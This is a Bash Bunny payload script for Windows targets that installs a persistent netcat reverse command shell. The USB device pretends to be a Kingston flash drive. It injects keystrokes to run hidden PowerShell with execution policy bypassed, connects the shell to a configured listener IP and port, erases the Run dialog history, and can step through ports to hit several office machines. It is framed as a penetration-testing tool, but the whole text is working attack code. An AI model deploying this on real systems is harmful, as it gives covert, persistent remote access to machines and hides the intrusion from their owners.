#!/bin/bash # # Title: RAZ_ReverseShell # Author: RalphyZ & JamesCullum # Version: 2.0 # Target: Windows 7+ (verified on Windows 10) # Dependencies: The following files must exist in the switch folder: # nc.exe - Windows binary for netcat (download statically compiled ncat from https://nmap.org/ncat/, f.e. http://nmap.org/dist/ncat-portable-5.59BETA1.zip) # listener_port.txt - The port number for the netcat listener # listener_ip.txt - The IP Address for the netcat listener # payload.ps1 - The payload being deployed # # Description: Configures a persistent netcat reverse cmd shell at a given IP and Port on the remote computer. # The reverse shell establishes the connection after every windows restart and right after the attack. # This script removes the log of the run dialog. # It can auto-increment the listener port so that the PenTester can create several listeners, and target multiple machines while on a walkabout in an office. # # Colors: # | Status | Color | Description | # | ---------- | ------------------------------| ------------------------------------------------ | # | SETUP | Magenta solid | Preparing the script and loading config | # | FAIL1 | Red slow blink | Could not find the listener_port.txt file | # | FAIL2 | Red fast blink | Could not find the listener_ip.txt file | # | FAIL3 | Red very fast blink | Could not find the nc.exe file | # | SPECIAL | Cyan inverted single blink | Incrementing the port in listener_port.txt | # | ATTACK | Yellow single blink | Running the Powershell payload | # | FINISH | Green blink followed by SOLID | Script is finished | # Options KEYBOARD_LANGUAGE = us #keyboard languge AUTO_INCREMENT = false #increment port on end of every run ######## INITIALIZATION ######## # Magenta solid LED SETUP # Set attack mode to HID and Storage # Change own identifier to random USB stick # - Manufacturer: Kingston # - Model: DataTraveler 150 (32GB) # - Serial number: https://web.archive.org/web/20170711011214/https://fakeflashnews.wordpress.com/2009/03/16/kingston-counterfeit-fake-32gb-datatraveler-150-usb-flash-drive-found-on-ebay/ ATTACKMODE HID STORAGE VID_0X0951 PID_0X1621 MAN_KINGSTON SN_00015788 # Get the switch position GET SWITCH_POSITION # Check for all the files - error if not found. If found, put into variables if [ ! -f "/root/udisk/payloads/${SWITCH_POSITION}/listener_port.txt" ] ; then LED FAIL1 exit 1 else my_port=`cat /root/udisk/payloads/${SWITCH_POSITION}/listener_port.txt` fi if [ ! -f "/root/udisk/payloads/${SWITCH_POSITION}/listener_ip.txt" ] ; then LED FAIL2 exit 1 else my_ip=`cat /root/udisk/payloads/${SWITCH_POSITION}/listener_ip.txt` fi if [ ! -f "/root/udisk/payloads/${SWITCH_POSITION}/nc.exe" ] ; then LED FAIL3 exit 1 fi # If the target computer has a different language enabled, activate this here. # You will also need to install the language json file on the bunny. QUACK SET_LANGUAGE ${KEYBOARD_LANGUAGE} # older firmware DUCKY_LANG ${KEYBOARD_LANGUAGE} # newer firmware ######## ATTACK ######## # Start the attack - yellow single blink LED ATTACK # Execute the powershell command in the run box with the appropriate variables QUACK GUI r QUACK DELAY 250 QUACK STRING "powershell -ExecutionPolicy bypass -WindowStyle Hidden \".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\${SWITCH_POSITION}\payload.ps1') -IP ${my_ip} -Port ${my_port}\"" QUACK ENTER ######## FINISH ######## # If auto_increment, then update the listener_port file if [ "$AUTO_INCREMENT" = true ] ; then LED SPECIAL echo $((my_port + 1)) > /root/udisk/payloads/${SWITCH_POSITION}/listener_port.txt # Allow the write to sync to the USB SYNC fi # The powershell script will try to copy the nc.exe from the bunny. # We should give it some time to copy it, instead of disconnecting right away. sleep 3 # Stop emulation ATTACKMODE OFF # Green 1000ms VERYFAST blink followed by SOLID LED FINISH